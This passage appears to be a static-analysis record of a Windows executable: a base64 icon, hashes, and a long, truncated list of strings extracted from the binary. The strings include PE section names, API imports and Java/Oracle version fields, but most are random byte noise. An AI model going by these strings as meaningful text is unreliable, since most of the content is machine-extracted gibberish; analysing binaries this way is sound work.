"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", "icon_hash": "9ff0d6ffb1478b5079f8bedc113d2807", "icon_fuzzy": "5cfea8f1729ef7fde13a51b01c74f6ec", "icon_dhash": "a2888adabcaed2ea", "imported_dll_count": 1 }, "data": null, "strings": [ "kM^T?", "[Kb&U", "A@(!@", "HGG(9", "hDhD4]7X?_", "`}():u", "hA\\F:", "/YV[\\", "!1+2;\\", "n76std", "ct1)[", "tv5O9&A", "%,JmK", "_`8_`;^0", "nU+\")V", "Ft2J/x", "StringFileInfo", "J0VV>", "TQw -3~", "I)NzS", "uu!$?", "gYw~p", "kernel32.dll", "P'gRvI", "\\w)g]$", "pK|+&", "bnwkO", "J$|jh", "l\\!aE", "R^&z}/", "JsQi\\", "m`Xo?]p", "b mlft[", "6)CR[W", "C`qn]O", "-wKH'W", "E@UXM", "7H;EZ", "^HYr\\", "~m%0p", ";[6,6v", "NR.+2eEt", "!This program cannot be run in DOS mode.", "\"?xk@", "dZ\\7h", "o;S[C", "v5!a+G", "G+_Oi", "),+RE/W", "cbw1o", "pX+SE", "BBIGNORE", "[QF.E", "4#E}V", "ZDW[%", "f1CD`Y", "7\\gn>", "cfqV5", "%222%333%333%444%555#555#555#555#555#555#555#222#222#222\"nnn", ":JU!3gB", "S[AQ-", "mK.pq", "[%cn)", "unpack200.exe", ";}-@k", "mxl`G", "k MZd", "Z>!s{", "/|O~|", "SP6j2MQ", "B([W:", "[u0\\i", ",;F0s", "5)2R2", "ezw2A", "u],S<", "O)eVd", "pBf6W", "QN)x{", "D 98J", ".adata", "n0OF{", "V!]|,", "IUc+PG", ")Jz+4Q", "fBq?|", "Op>/=6*", "4Sk\\,", "q;F]4tT", "6bC~u", "Unh]k", "\"wYVi", "$[Wvt~", "ChJ=8", "EP&20", "u,}9[", "BNH)HE", "T__1222821643", "AQ*{T", "w2ZIG", "p#^Qq", "?U!eaHs", "3YjQr", "18]e>", "===#www", "&yCx/(a", "#u@|ue", "s<>3B", "WG; i", "z|i#h", "b\\QYl", "D%+Ua", "|2H5w", "@vnwQ", "5p_cb", "CKs4w", "<{*7R", "2uC/w", "c]MdBV(", "`.r3S", "UQ:fo", "4O?%{", "g]%eiU", "\".GW>a", "li`qQE", "4a&)n|BE", "HXl!g]07", "p12owWL6*", "7b65\"63", "#{y+4", "2zPngB", "~=>%a", "msc+8F", " Qva0", ".ekqk", "?,o(n", "i~#G0", "H n52C,\"", "~i#VFkV^Xuc", "ulU,'}", "-@J?R", "C)bUP", "X^xvO", "S9Dp%*", "KI`\"b", "yUCU2", "\\#cNF@", "$#>roA", "!PC;Ba", "1l`r%", "T\"uTx", "XPTPSW", "TGXFT", "mLcC P", "9@{*", "\"@}.c", "y:Mc@", "3oWQ:r", "5S@H*", "IS/oJ", "0qM*waL", "MSI>;u", "w,/Fb", "w-~p:", "a/2@K", "EGH+-", " rhFg", ".XX%YG]", "FileDescription", "c&>gK", "5wY#lz", "5[1xs", "eoz)s", "r`fon", ">.-+1", "e(;;O", "hM\\nU", "fyo~jk", "$$Yk/", "O'{lw", "Q9)O#H", "T-Q4}", "rqe7%&h", "Lx|gY", "Xl2wtO", "\"o.*oB", "-.K*7", " :H{H{P{Xia", "uYJUM", "l|ee!", "HHH=jjjUnnnUmmmUmmmUmmmTmmmTmmmSmmmSnnnS|||R", "4'=D/", "E-;[@", "cur]\"", "W.@P^x4M", ")!`Cs", " i*JT", ")/lKQT", "rM[ W", "C'6=Z", "JHe`B", "Y:[l,", "ll,q9", "xqO7x", "ExitProcess", "T0{4_", "Ku6#h", "a41>u", "y8\\>U", "7.<]tf", "C=teMu", "LS`@Xt", "xkX+g", "'N1He", "~RQK3-", "u#P\\-,b", "gR(s&*", "Maq-5", "LdY/P", "n2mdb", "Dk]+Y", "(JmkE;jl", "dpTK$", "I7bj(", "E%]`7", "P#:n4", "hOO67", ".(bicV", "&f~,W", "\"f3A3", "4lWz_Z", "-CukKY", "`FRTY_K", ":>SH-", "VH4H[", "ihhGf", "Ovyx3", "$g\\%->s", "GFu0F", "y8,/;", "DVCLAL", "c!0W1", "u[?s|N", "d7M}F", "|x:-v", "=T/hq", "h:=(V", "L}`pr", "*Ol`7", ">2'GM", "RJ0kh", "d#J;KQM DX", "g4496", "90tr0B=", "@?D5k", "(hGSe-", ".^ieR", "pI4Sm", "Q,/ug", "-BkPIih\"", "#f{lowi8a", "STbM-", "pl4L)o", "t8WY)IZ", "[wNRJ", ",Qz2RA", "!3X@V-", "OKwQK", ";e>4 ", "yx\\,o", "BBRETRY", "R6028", "cwYyR", "Qko^T", "d*i~V", "(\"r>w?", "u6AQVj", "tc[f;", "VUIdqp", "LoadLibraryA", "vx^\"D", "D{8C2", "H0=ri", "aA0+Q", "70&['", "AJALz7", "8<@~M", "[Sh40X", "B(lJm6/09OF3", "466t`;", "s1\\7!", "GetModuleHandleA", "VarFileInfo", "8AU&x", "4KbX\\H", "XxbN?WC", "SzbA^", "f(X~j", "`R-\\z", "Mxnz6", "mJ[:dHg", "Copyright ", "X=J4C", "6./lE&~A", "u*^zh", "Oj.uc", "sPo0f", "(vaKy", "iJ)h%E", "!%8 l", ":u'c*", "T^\\4;", "cL!v<", "0h6l:", "Vp9K?", ";q;q2", "+j&+?", "~|nvl", "4wVfXB", "93kX(", "nKb&9H2", "dPWZKD", "Ly6q4", "86Rw|", "OBJnG", "WX\\HA?", "06nQ>", "/EGQ++", "Gj#:wi", ":rw7HK>", "BRq2+p", "!WIi6", "f=_x5|", "f8CZ2", "pP8`Wx", "7DYKy3", "G@S\\wbz", "A{b=^{", "a'Bfh", "zWP?,", "c1h[\\", "7+1BM", "Br%{q~", "fX:EN", "?'p89J:X", "p,tupInfo", ")^#D&", "DZ^u`", "=lW^Z", "%ejI-", "Dq`-6Dp", "7{ {U", "A$5566778", ",j&G3", "4c", "sjoWuo", "\\JIa;", "p7R[F", "O^efB", "jso|I", "7~)IQ", "3,*1y", " =R6,", "39{t@", "%nmlK", "-RjEV", "lBB s", "iz!j,", "wN83#Zh.<,", "],.'%", "Kf&}m", "}P04%", "N{\"6#", ",5ed4~", "#9bc!", "7Po@Z", "qf`$N", "OvIJx", "vE8:u,", "=s8S_6e", "72?Veh", "?Zy'Y", "AO`TY", "ph\"])", ",isXL", "bkO(ui", "The procedure entry point %s could not be located in the dynamic link library %s", "cA_9yN", ")| WuZ", "sQf)_t$", "%qY[-l[-", "('&nbK", "E?aKRy", "k$#TK", "aut6V", "kc[k\\", "T__1226125832", "dwAz^", "{ {(i!", "|q/Cf2", "-sxkE", "RuFGg", "Eq~Za", "&K-Vh", ";[e9;", "#f4|]", "W=%1 )", "3P 7C", "A[$,(C", "DfN{)", "Y4ojR;", "(Ed=/", "&+mL|q", "3NTX|", "3.?VE'", "R?yhf'", "^TVep)j", "X!y f", "%R, 0", "Ng{kd", "_KyG\"z);", ";\\e8+QM", "kr7=j", "GetLa2Ag", "VirtualFree", "A_MhF7", "b6e#;", "DZ Xx^", "'7Qyb", "@kAST", "-3G H", "bi\\4K6=#", ".idata", "H>5*0xJ", "QXLLC", "vI|CJ", "bhf%TI", "Lut\\6", "h0qkOV'(", "d%wBF", "t`&&D", "WiUSC", "C=I1<", "qJl'#3}", "?\\s7c", "mt&mf", "|d@#J", "a\"BK}:", "wo1.`D", "ehVe cZh", "=y", "0W/$Y%v", "~Tu=0>Y", ",es6E", ":$r'p5;", "Z&fC ?", "MAINICON", ">hbtK", "%$Q(^", "A6tMu", "[R&B<", "v`=h1", "FH3GCQx", "PoPIC", "Soykv", "h/r{C", ">0>P,", "cjsC:", "I}Md-[BJ", "Kz%`^", "RN L&|p", "wxZ)6K[", "L+a!UBG%", "OP:E;", ">q][9", "heap7", "Translation", "XWQ]Y!$\"", "h dx", "unpack200", "^kgkg", "t\"Fk@", "b?/LZ?", "wLW`]", "blsg%[g", "kVdW$", ">K#4(P", "a/lock", "i^wZYKK", "4HbA(", "t7Wl,", "F24Gk*", "N@CE9p", "YlE,2", "ACgQsx", "N93zO", "Mod7eHandl`=", "|@zHM", "[(lgR", "dey>Ti-", "R-afK", "K2lw;g", "eNam^F;", "@qI?1", "MvMN&K", "j7,ab", "YvK6*", "#F!G?", "7- ;`.e", "\\Y}KY", "Se}1h", "dj3goQ", "a,Kr.-= I", "Oracle Corporation", "ExicG", "XAOT ", "o0ir%", ".reloc", "W\"#d4", "USER32.dll", "?x5u&", "(|7@C~", ">d0>Z", "Java(TM) Platform SE binary", "O[Yy(", ".[bLV1N", "~Xhp~", "V+YlN", "4AyC3", "v&]%f", "@iTCV_&", "mikAxRA[", "SJ;sP>tPD<", "d~OxLa[", ":[H$PB", ")Q](7", "0.+8{", "#pxKau`", "&dO_IF'", "BBCLOSE", "',jWI", "z*4R<", "9p\\x!", "QZwCs", "g/$:iw", "bJ/p2P", "MRich&Q", ".g/F(v`", "FileVersion", "69~`O/n", "gi*86", "OriginalFilename", "P0i#f", "tX]i_", "eJ|X,", "0", "v5;:T", "^g}v?", "1_-kM", "DOh?EW", "#4n$Q", " 2018", ",$zQl", "#CZpM\\", "p{S'S", "8E\\6]0", "SmCsw", "g('ft", "v95c}R", "r&l|}", "pt8Fi", "Ets~\"", "d\\\";5", "^1(HdD", "xn_68{", "Jb4oT", "5\"X)i", "Iuo!y'", "i8JXl", "}&s-@", "*]>:n", "asXy :", "a\"k^1", "M-`90", "LegalCopyright", "9]>Te", "On`;/", "1oz{l", "QZn<,", "UqUl*')", "z!&_?", "HS$on", "g5fpl", "'3,Xo@7", "ll$4kofO", "{i5;j", "`I,Bn", "gsb~#QW", "D/17e", "kPz\"#cx", "qvgIp", "F4D&?", "/UXV^7e", "q\\C^^", "ZN`HLM", "x,65+", "Q!3=63M]4", "bQ|Cb", "<>Ha|R", ".+{WT", "VS_VERSION_INFO", "b#MiqD", "w{Lib", "<.|,d", "jNtNq", "mlqTbv", "JLbem", "Y|8\"T", "U$^'SW", "F?jvG", "FwiZw", "wcoRb", "11}_\"", "}T'F:>", "FkxP\"", "ZhkK/", "?I\"U4;", ".rdata", "p@gram ", "gNv[v", "'Go/7", "cSR2]p", ";:6d2", "DChx[l", "Sg@6f,4 ", "f[", "=X90rp", "qJst*", "b(WFk", "|WfZH-", "oaz\"^%~", "ZH5 oDB", "c&nzU", "1r3=G3", "s;=|?GfV", "N72Br", ";;F,s", "vNs|5", "D:9*@", "$'8>W", "m2C{Q", "MQO{bN;}", "B%A9pZ", ")zsXy2", "F4a1H", "Xn >/", "1TQ[C", "'gF6<", "{M.$F_Xw", "cm^iQ5", "8%XM9", "_%32.d*o.?", "LK$^E~", "A)>h?pBxjr[", "bldZ,,", "#=wpuY", "m|ZB`", "jng;q", "mSPVz.", "+6:mUd", "=z*}M~", "\\$,tZ", "r#Lg$", "!p-yZ", "F49S.", "J\\Sai", "BBHELP", "xv.E\\b", "l Imxs@7", "KHbyI", "f9$AB?", "ss`hJt", "?ggvC", "{nrDh", "r+2 VL", "0JVkF#4N", "V`h!7", "Cy>0 ", "fT@Ii", "p%cqA7a", "VC20XC00", "p-[j-", "r7x_=", "J2&yPx", "o*&)+e", "U\\RK?9", "r_X.a", "4]Sm'*", "q)-%7", "i'[3DL", "V.27:", "5W.)wi", "17cQA", "=MT>F", "J--Z=", "x\"Zex", "O\\7bm", "k_rYdZy", "[2|4l", "b0]B*", "[C0gov", "zOuaD", "7v+`![WmK", ";<.Q{TVW", "t1g|9", "&EM#@", "6bk.U", "Ty)#LCMap", "e#&>hxq", ".text", "-|H(7", "L6/08", "YtSjCx", "1BVs}O", "\\BLhL3T", "by VfG[", "JtLP].", " ]2b)", "2S1-z", "&|#m&o ,", "?a.bC", ",klwn>", " q9Na", "!Iqh`", "_GGYYFFVBDEW", "^i16r", "H(}QE", "U]eniP", "*D&QV", "Sit{XO", "-bcUf", "!,%LxY/", "C>_aI", "57NhV", "j-&4~~", "D]<11", "ByLToWideChar\"o", "9,G`F", "sKa{g", "V}+Cj ]", "5\"T9p", "Iz/UU", "opeX1so", "`^=y1", "S@],H", "<_C,+0", "[y\"%i", "vvAQP", "I3j\\2", "rCE- V", "wM\"8PVj", "$RL0'", "h/-91", "jilyp{", "ProductVersion", 